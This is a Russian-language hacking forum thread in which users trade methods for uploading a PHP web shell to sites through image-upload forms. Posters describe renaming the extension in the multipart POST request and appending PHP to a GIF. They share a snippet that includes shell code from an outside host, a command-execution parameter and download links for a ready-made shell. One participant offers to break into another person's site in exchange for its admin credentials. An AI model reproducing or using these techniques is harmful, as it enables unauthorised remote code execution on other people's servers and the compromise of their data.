Есть торрент в нем есть заливка картинок.
Могу залить картинку и сделать её не jpeg а php.
При заливке простой картинки все нормально и в пхп сохраняет. Вот ниже если поменять jpg на php то на сервер он зальёт как php.

-----------------------------220022761016327\r\nContent-Disposition: form-data; name="file";
\nContent-Disposition: form-data; name="file"; filename="1.jpg"\r\nContent-Type:
и там дальше исходник картинки.



А вот когда шелл сохраняем в формате jpg и пытаюсь залить он не заливает.

Вобщем кто знает как обойти фильтр.
Все делается через post запрос.
Или скинте картинку с шелом

Состряпай в пейнте картинку 1 на 1.
Открой её фаром и на новой строке впиши код шелла (какой нидь не большой типа выполнялки команд).

К примеру гифка: http://rapidshare.com/files/229115118/m.gif.html
?ev=phpinfo();

да все супер залил но теперь при заходе на эту страницу вылетает такое.


http://i052.radikal.ru/0905/0e/f805d357507b.jpg

Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell

да все супер залил но теперь при заходе на эту страницу вылетает такое.


http://i052.radikal.ru/0905/0e/f805d357507b.jpg

Всё правильно, так и будет вылезать, но код при этом будет выполняться, а все остальное будет отображаться как html.

Если юзал мою картинку, то выполняй код так:

gif.php?ev=phpinfo();

ну вот у меня трабл тоже самое я могу ... но на фотку твою добавил р57 не сработало (

Грей обясни.. плз

http://file-hran2006.narod.ru/shell.txt если нужен шелл, не ищи.

мне тока кодировка фотки ( шелл есть )

Спасибо, много узнал, читая тему.

сделал всё как надо серавно тупит!!!

Ну так,ты напиши код в конце картинки нужный, и заливай.
Например в конце допиши:
<?
if(isset($_GET['shell'])){
include('http://mysite.com/shel.txt');
}
?>
И обратись к шеллу, http://torent.ru/img/gif.php?shell
кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...

кто-нибудь.. объясните пожалуста, как все-таки заливать через картинку? перепробовал все уже.
это особенно не понимаю: "И обратись к шеллу, http://torent.ru/img/gif.php?shell"
но как обратиться к shell.php если я заливал shell.gif...
Обращайся к shell.gif снужными get параметрами.И сейчас эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже.

в таком случае есть ли еще способы?

в таком случае есть ли еще способы?
В каком именно случае?

способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."

способы заливки шелла через картинку, раз "эта уязвимость уже ооочень не актуальна, почти везде все прикрыли уже."
Ну так,что бы такой способ сработал,должны быть кое какие условия все же)) нельзя же просто залить картинку,и получить шелл.Вот я и спрашиваю,а какие условия у вас? Моет вы на рапиду льете шелл,кто вас знает

есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.

есть админка, в ней есть возможность залить картинку, пропускает только с расширением .jpg .gif
и, нет, шелл не на рапиде естественно.
Если есть админка то тут намного проще! напиши двиг сайта может смогу помочь! ;)

Обычно это делается, если у тебя под рукой есть инклуд (или ещё что либо). Тупо заливаешь картинку со своим php кодом, и потом инклудишь чтобы код выполнился. А если ты просто залил картинку с php кодом, то просто так он исполнятся не будет ведь.

какая-то CMS KalugaSity. дык еслибы был инклуд я и не спрашивал =)

какая-то CMS KalugaSity. дык еслибы был инклуд я и не спрашивал =)
Если хочешь скинь админские права и ссыль на сайт в ПМ попробую залить шелл, если выйдет дам ссылку ;)

на заметку:
http://habrahabr.ru/blogs/php/44610/
http://raz0r.name/articles/bezopasnost-zagruzhaemyx-izobrazhenij/